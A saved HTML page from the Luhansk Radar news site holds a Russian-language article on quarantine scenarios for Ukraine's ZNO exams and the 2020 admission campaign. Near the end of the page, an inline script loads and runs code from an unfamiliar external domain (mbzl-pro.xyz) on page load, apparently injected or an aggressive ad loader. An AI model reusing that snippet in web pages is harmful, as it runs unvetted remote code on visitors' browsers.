        <div class="td-container td-post-template-1 ">
            <div class="td-crumb-container"></div>
            <div class="td-pb-row">
                                        <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                

    <article id="post-208457" class="post-208457 post type-post status-publish format-standard category-obchestvo-2" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            
            <header class="td-post-title">
                <h1 class="entry-title">Когда состоится пробное ВНО и изменят ли тесты из-за карантина: важное заявление</h1>

                

                <div class="td-module-meta-info">
                                        <span class="td-post-date"><time class="entry-date updated td-module-date" >Мар 31, 2020</time></span>                                        <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-208457">0</span></div>                </div>

            </header>


        </div>

        

        <div class="td-post-content tagdiv-type">
            <div class="td-featured-image-rec">

                        </div>

            <div itemprop="articleBody">
<p> <span style="background-color: initial;">В Украине разработали два варианта проведения внешнего независимого оценивания (ВНО) с учетом </span>карантина<span style="background-color: initial;">, при этом вносить коррективы в тесты из-за дистанционного обучения не будут.</span> </p>
<p> Об этом в эфире телеканала &#171;1+1&#187; сообщила исполняющая обязанности министра образования Любомира Мандзий. </p>
<p> &#171;<em>На сайте Министерства образования опубликованы варианты проведения ВНО. Если у нас к учебе возвращаются в начале мая, то в мае проводим пробное ВНО. Если возвращаемся в июне, то в июне будет пробное ВНО. Основная сессия ВНО несмотря на начало обучения будет стартовать 25 июня. Это такие предварительные действия. Если карантин не заканчивается, то по его завершению мы сможем провести пробное и основное ВНО. А, следовательно, будут изменены даты вступительной кампании&#187;</em>, &#8212; заявила она. </p>
<p> Мандзий добавила, что даты вступительной кампании будут скорректированы до проведения основной сессии ВНО. </p>
</p>
<p> <script type="text/javascript">         </script> </p>
<p> Вместе с тем, и.о. министра добавила, что то наполнение, которое уже есть в заданиях ВНО, менять из-за дистанционного обучения не будут и все вопросы будут оставаться. </p>
<p> Мандзий также подчеркнула, что проводиться олимпиады не будут, поэтому дополнительных баллов при поступлении ни у кого не будет, то есть &#171;все в этом году будут в равных условиях&#187;. Отменят и государственные итоговые аттестации для учеников 4-9 классов. </p>
<p> В связи с карантином Министерство образования разработало два сценария завершения учебного года, проведения внешнего независимого оценивания и вступительной кампании. </p>
<p> Первый сценарий: карантин завершается до конца первой недели июня. </p>
<p> При этом сценарии все ученики (кроме 11-го класса) заканчивают учебный год в конце июня. После карантина для них организуется корректирующее обучение: учителя определят темы, по которым есть пробелы в знаниях и укажут, какие темы необходимо дополнительно доработать дома. </p>
<p> Выпускники 11-х классов учатся до конца июня – корректируют пробелы в программе, готовятся к ВНО. При этом ВНО стартует ориентировочно в последнюю неделю июня и заканчивается в середине июля. Результаты основной сессии ВНО станут известны в конце июля. Вступительная кампания начнется в начале августа. </p>
<p> Второй сценарий: карантин продолжается до начала августа. </p>
<p> При этом сценарии все ученики (кроме 11-го класса) заканчивают обучение в конце мая и получают соответствующие документы. В 2020-2021 учебном году первый месяц обучения будет корректирующим. Учителя проведут срез знаний, идентифицируют темы, по которым есть пробелы, чтобы компенсировать их в течение первого месяца обучения. Сам 2020-2021 учебный год продлится до конца июня. ВНО для учеников 11-го класса стартует в середине августа и закончится к середине сентября. </p>
<p> Вступительная кампания завершится до середины октября, а обучение первых курсов начнется в начале ноября. Обучение остальных курсов начнется с 1 сентября. </p>
<p> Как сообщал &#171;Апостроф&#187;, ранее в Украинском центре оценивания качества образования заявили о возможности переноса сроков ВНО из-за карантина. </p>
<div class="advertinline">
<p><script type="text/javascript"></p>
<p>	</script>
</div>
</p></div>
<div class="td-a-rec td-a-rec-id-content_bottom  tdi_4_857 td_block_template_5">
<style>
/* custom css */
.tdi_4_857.td-a-rec-img{
				    text-align: left;
				}.tdi_4_857.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }
</style><!-- Composite Start --> 
 <div id="M553298ScriptRootC845725"> 
 </div> 
 <script src="https://jsc.mgid.com/l/u/lugradar.net.845725.js" async> 
 </script> 
 <!-- Composite End --> 
<script id="-Qb5mFiYJrpATOrq">if (window.relap) window.relap.ar('-Qb5mFiYJrpATOrq');</script>

 </div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

                                    <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://lugradar.net/author/vika">vika</a></span></div>	        <span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="vika"></span><meta itemprop="datePublished" content="2020-03-31T16:02:26+03:00"><meta itemprop="dateModified" content="2020-03-31T16:02:26+03:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://lugradar.net/2020/03/208457"/><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://lugradar.net/wp-content/uploads/2020/03/3.png"></span><meta itemprop="name" content="Луганский радар"></span><meta itemprop="headline " content="Когда состоится пробное ВНО и изменят ли тесты из-за карантина: важное заявление"><span class="td-page-meta" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://lugradar.net/wp-content/themes/Newspaper/images/no-thumb/td_meta_replacement.png"><meta itemprop="width" content="1068"><meta itemprop="height" content="580"></span>        </footer>

    </article> <!-- /.post -->

    
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <style>.rpwe-block ul{
list-style: none !important;
margin-left: 0 !important;
padding-left: 0 !important;
}

.rpwe-block li{
border-bottom: 1px solid #eee;
margin-bottom: 10px;
padding-bottom: 10px;
list-style-type: none;
}

.rpwe-block a{
display: inline !important;
text-decoration: none;
}

.rpwe-block h3{
background: none !important;
clear: none;
margin-bottom: 0 !important;
margin-top: 0 !important;
font-weight: 400;
font-size: 12px !important;
line-height: 1.5em;
}

.rpwe-thumb{
border: 1px solid #eee !important;
box-shadow: none !important;
margin: 2px 10px 2px 0;
padding: 3px !important;
}

.rpwe-summary{
font-size: 12px;
}

.rpwe-time{
color: #bbb;
font-size: 11px;
}

.rpwe-alignleft{
display: inline;
float: left;
}

.rpwe-alignright{
display: inline;
float: right;
}

.rpwe-aligncenter{
display: block;
margin-left: auto;
margin-right: auto;
}

.rpwe-clearfix:before,
.rpwe-clearfix:after{
content: "";
display: table !important;
}

.rpwe-clearfix:after{
clear: both;
}

.rpwe-clearfix{
zoom: 1;
}
</style><aside id="rpwe_widget-5" class="td_block_template_5 widget rpwe_widget-5 rpwe_widget recent-posts-extended"><h4 class="td-block-title"><span>Лента новостей</span></h4><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T15:12:58+03:00">15:12</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208445" title="В первые дни апреля Луганщину &#171;прихватят&#187; ночные морозы" rel="bookmark">В первые дни апреля Луганщину &#171;прихватят&#187; ночные морозы</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T15:03:43+03:00">15:03</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208437" title="В Ощадбанке рассказали, что будет с платежными картами во время карантина" rel="bookmark">В Ощадбанке рассказали, что будет с платежными картами во время карантина</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T14:22:47+03:00">14:22</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208426" title="На Луганщине обнаружен схрон с арсеналом артиллерийских снарядов и гранатометов. ФОТО" rel="bookmark">На Луганщине обнаружен схрон с арсеналом артиллерийских снарядов и гранатометов. ФОТО</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T12:57:50+03:00">12:57</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208407" title="Все пациенты с подозрением на коронавирус в больнице Рубежного находятся в удовлетворительном состоянии" rel="bookmark">Все пациенты с подозрением на коронавирус в больнице Рубежного находятся в удовлетворительном состоянии</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T12:47:44+03:00">12:47</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208402" title="&#171;В плачевном состоянии&#187;: в сети показали неухоженную территорию возле озера в Северодонецке. ФОТО" rel="bookmark">&#171;В плачевном состоянии&#187;: в сети показали неухоженную территорию возле озера в Северодонецке. ФОТО</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T12:35:09+03:00">12:35</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208399" title="СМИ: В больнице Рубежного 4 пациента с подозрением на коронавирус" rel="bookmark">СМИ: В больнице Рубежного 4 пациента с подозрением на коронавирус</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T12:25:26+03:00">12:25</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208395" title="В Украине открыли рынок земли: как голосовали депутаты от Луганской области" rel="bookmark">В Украине открыли рынок земли: как голосовали депутаты от Луганской области</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T12:13:06+03:00">12:13</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208393" title="На Луганщине боец ООС подорвался на противопехотной мине" rel="bookmark">На Луганщине боец ООС подорвался на противопехотной мине</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T12:01:55+03:00">12:01</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208390" title="В Северодонецке дети подожгли чужой автомобиль" rel="bookmark">В Северодонецке дети подожгли чужой автомобиль</a></h3></li><li class="rpwe-li rpwe-clearfix"><time class="rpwe-time published" datetime="2020-03-31T11:52:11+03:00">11:52</time><h3 class="rpwe-title"><a href="http://lugradar.net/2020/03/208385" title="Германия и Франция обеспокоены положением миссии ОБСЕ в Украине" rel="bookmark">Германия и Франция обеспокоены положением миссии ОБСЕ в Украине</a></h3></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></aside><aside id="text-4" class="td_block_template_5 widget text-4 widget_text">			<div class="textwidget"><!-- Yandex.Metrika counter -->
<script type="text/javascript">
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter22625773 = new Ya.Metrika({
                    id:22625773,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true,
                    webvisor:true,
                    trackHash:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/watch.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/22625773" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
</div>
		</aside>                            </div>
                        </div>
                                    </div> <!-- /.td-pb-row -->
        </div> <!-- /.td-container -->
    </div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->

	
	
            <div class="tdc-footer-wrap ">

                <!-- Footer -->
				
                <!-- Sub Footer -->
				    <div class="td-sub-footer-container td-container-wrap ">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span td-sub-footer-menu">
                                    </div>

                <div class="td-pb-span td-sub-footer-copy">
                    &copy; 2013 - 2020 Луганский Радар. Все права защищены.                </div>
            </div>
        </div>
    </div>
            </div><!--close td-footer-wrap-->
			
</div><!--close td-outer-wrap-->




    <!--

        Theme: Newspaper by tagDiv.com 2019
        Version: 10.3.1 (rara)
        Deploy mode: deploy
        
        uid: 5e834747443d3
    -->

    
<!-- Custom css from theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.rpwe-block li { 
margin-bottom: 6px; 
padding-left: 40px; 
margin-left: 0; 
padding-bottom: 6px; 
position: relative; 
border-bottom: 1px solid #eee; 
} 

.rpwe-time { 
padding: 2px 10px 0 0; 
line-height: 1.5em; 
position: absolute; 
left: 0; 
} 

.rpwe-block h3 { 
font-size: 15px!important; 
}
</style>

<div class="td-container"><script type="text/javascript" async src="https://relap.io/api/v6/head.js?token=Bn4Gf_t_v9MuMRAV"></script>
<script type="text/javascript">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</script>
 <!-- 1727fe3d9b1387f9 -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43561524-1', 'auto');
  ga('send', 'pageview');

</script></div><script type='text/javascript' src='http://lugradar.net/wp-includes/js/underscore.min.js?ver=1.8.3'></script>
<script type='text/javascript' src='http://lugradar.net/wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=8a1d9913b13d9ab2baf63a2b29cd9fc1'></script>
<script type='text/javascript' src='http://lugradar.net/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=10.3.1'></script>
<script type='text/javascript' src='http://lugradar.net/wp-includes/js/comment-reply.min.js?ver=2e2302cf56c0f42f1e414c5294cfde3c'></script>
<script type='text/javascript' src='http://lugradar.net/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=8a1d9913b13d9ab2baf63a2b29cd9fc1'></script>
<script type='text/javascript' src='http://lugradar.net/wp-includes/js/wp-embed.min.js?ver=2e2302cf56c0f42f1e414c5294cfde3c'></script>
<script type="text/javascript">
    (function(w,d){var script = d.createElement('script');script.src = '//mbzl-pro.xyz/get_code?w=2890'+'&r='+Math.random()*10000000000;;d.body.appendChild(script);})(window, document);
</script>
<!-- JS generated by theme -->

<script>
    

                jQuery().ready(function jQuery_ready() {
                    tdAjaxCount.tdGetViewsCountsAjax("post","[208457]");
                });
            
</script>


</body>
</html>